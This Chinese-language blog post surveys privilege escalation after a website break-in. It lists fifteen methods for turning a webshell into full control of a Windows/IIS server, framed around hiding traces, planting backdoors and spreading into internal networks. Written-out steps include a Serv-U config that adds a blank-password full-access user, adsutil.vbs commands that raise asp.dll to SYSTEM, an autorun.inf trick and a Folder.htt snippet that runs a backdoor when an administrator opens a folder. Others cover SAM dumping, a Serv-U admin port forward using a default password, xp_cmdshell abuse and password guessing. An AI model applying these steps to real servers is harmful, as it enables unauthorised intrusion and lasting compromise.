提权综述与基本方法

提权综述

1、提权定义:

提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得改服务器权限。

2、基本概念:

提权攻击原理是主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限,从而进一步获得服务器权限。

3、掌握相关的提权工具工具进行提权

        操作系统本身的提权

        利用数控进行提权

        系统配置不当提权

        第三方软件提权

4、提权后的操作

        清理痕迹--隐藏攻击

        安装后门--长久控制

        渗透内网-扩大战果

5、用户组权限

Administrators 属于该administators本地组内的用户,都具备系统管理员的权限,它们拥有对这台计算机最大的控制权限,可以执行整台计算机的管理任务。内置的系统管理员帐房Administrator就是本地组的成员,而且无法将它从该组删除。

Guests 该组是提供没有用户帐户,但是需要访问本地计算机内资源的用户使用,该组的成员无法永久地改变其桌面的工作环境。该组最常见的默认成员为用户帐号Guest

Users 该组员只拥有一些基本的权利,例如运行应用程序,但是他们不能修改操作系统的设置、不能更改其它用户的数据、不能关闭服务器级的计算机。 
所有添加的本地用户帐户者自动属于该组。

6、文件权限

读取:该权限允许用户查看该文件夹中的文件以及子文件夹,也允许查看该文件夹的属性、所有者和拥有的权限等;

写入:该权限允许用户在该文件夹中创建新的文件和子文件夹,也可以改变文件夹的属性、查看文件夹的所有者和权限等。

执行:该权限允许用户在该文件夹中执行任何脚本文件或者.exe可执行文件,此权限如果设置不当,会对计算机的安全带来严重危害。

 


权限提升15大法

1radmin连接法

条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去 。


2.paanywhere

C:\DocumentsandSettings\AllUsers\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去


3.SU密码夺取

C:\Documents and Settings\All Users\「开始」菜单\程序\

引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

        [USER=WekweN|1]

        Password=

        HomeDir=c:\

        TimeOut=600

        Maintenance=System

        Access1=C:\|RWAMELCDP

        Access1=d:\|RWAMELCDP

        Access1=f:\|RWAMELCDP

        SKEYvalues=

这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限


4.c:\winnt\system32\inetsrv\data\

引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行


5.运行Csript

引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll再将asp.dll加入特权一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""

c:\winnt\system32\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了


6.脚本提权

        c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入batvbs


7.VNC

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

我们可以用vncx4破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据,每输完一个回车一次就行了。


8.社会工程学之GUEST提权

        很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO


9.IPC空连接

        如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令


10.autorun .inf

        autorun=xxx.exe 这个=后面自己写加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行


11.desktop.iniFolder.htt

引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义

文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder

setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后

我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">

然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方

任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门

C:\WINNT\system32\config\ 下他的SAM 破解之


12.su覆盖提权

        本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了


13.SU转发端口

        43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe v l 3333 r

43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u


14.SQL帐户密码泄露

        如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IPUserPass DL.bitsCN.com网管软件下载中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了


15.asp.dll

引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

好了,现在你可以用cscript adsutil.vbs get/W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意,用法中的getset,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.




 

 


版权声明:若无特殊注明,本文为《Chin》原创,转载请保留文章出处。
本文链接:https://www.qinor.cn/post-28.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框
可使用QQ号实时获取昵称+头像

私密评论

吃奶的力气提交吐槽中...

已有1条吐槽

匿名

2018-10-10 22:46 广东省广州市电信
哇哦(ノ=Д=)ノ┻━┻
 Huawei BND-AL10   MQQBrowser 6.2